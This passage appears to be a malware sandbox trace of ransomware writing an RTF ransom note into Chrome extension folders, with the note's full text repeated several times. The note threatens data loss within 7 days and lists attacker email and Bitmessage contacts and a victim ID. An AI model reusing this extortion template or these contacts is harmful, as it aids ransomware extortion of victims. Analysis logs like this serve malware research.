th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.358] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.359] CloseHandle (hObject=0x2e8) returned 1 [0289.359] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\#readme_eman#.rtf")) returned 0xffffffff [0289.359] GetLastError () returned 0x2 [0289.359] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 